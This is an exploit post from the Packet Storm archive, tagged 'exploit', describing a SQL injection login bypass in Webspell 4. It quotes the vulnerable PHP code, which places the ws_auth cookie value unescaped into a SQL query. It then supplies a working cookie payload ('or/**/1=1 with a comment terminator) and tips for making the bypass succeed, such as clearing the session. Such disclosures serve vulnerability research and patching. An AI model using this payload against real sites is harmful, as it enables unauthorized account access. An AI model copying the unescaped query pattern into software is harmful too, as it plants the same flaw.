what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Webspell 4 SQL Injection

Webspell 4 SQL Injection
Posted Jan 4, 2009
Authored by h0yt3r

Webspell version 4 suffers from a SQL injection vulnerability that allows for authentication bypass.

tags | exploit, sql injection
SHA-256 | d44bb51f35980ad029f2b60873d201e0e444b83c0b6bc9623281070c2617f83d

Webspell 4 SQL Injection

Change Mirror Download
#Webspell Login Bypass
#Found by: h0yt3r
#
##
#Checklogin.php Line 60:
#
# setcookie("ws_auth", $ds['userID'].":".$ws_pwd, time()+($sessionduration*60*60));
# $login = 1;
#
##
#_functions.php Line 253:
#
# $login_per_cookie = false;
# if(isset($_COOKIE['ws_auth']) AND !isset($_SESSION['ws_auth'])) {
# $login_per_cookie = true;
# $_SESSION['ws_auth'] = $_COOKIE['ws_auth'];
# }
##
#src/login.php:
#
# global $userID, $loggedin;
#
# $userID = 0;
# $loggedin=false;
#
# if(isset($_SESSION['ws_auth'])) {
# if(stristr($_SESSION['ws_auth'], "userid")===FALSE){
# $authent = explode(":", $_SESSION['ws_auth']);
# $ws_user = sprintf('%u', $authent[0]);
#
# // ws_pwd must be a string without spaces and with a maximum length of 32 <- ???
# $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);
#
# if(isset($ws_user) AND isset($ws_pwd)) {
#
# $check = safe_query("SELECT userID FROM ".PREFIX."user WHERE userID='$ws_user' AND password='$ws_pwd'");
#
# while($ds=mysql_fetch_array($check)) {
# $loggedin=true;
# $userID=$ds['userID'];
# }
# }
# } else die();
# }
# ?>
#
#
####

// ws_pwd must be a string without spaces and with a maximum length of 32
$ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);

Wuta fuck is dis crap?!
$_COOKIE['ws_auth'] can be exploited by somting like dis:
1:'or/**/1=1/**/limit/**/0,1# (# <- is a comment, dont forget...)
And btw:
$_SESSION['ws_auth'] = $_COOKIE['ws_auth'];
So dont foget to delete teh session...
Bad thing: Only works wit magic_quotes == off

But they got some function:
#_functions.php:74
#function sql_quote($value) {
#
# if( get_magic_quotes_gpc() ) {
# $value = stripslashes( $value );
# }
# if( function_exists( "mysql_real_escape_string" ) ) {
# $value = mysql_real_escape_string( $value );
# }
# else
# {
# $value = addslashes( $value );
# }
# return $value;
#}
And why in the world isnt it used?!

~END~

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close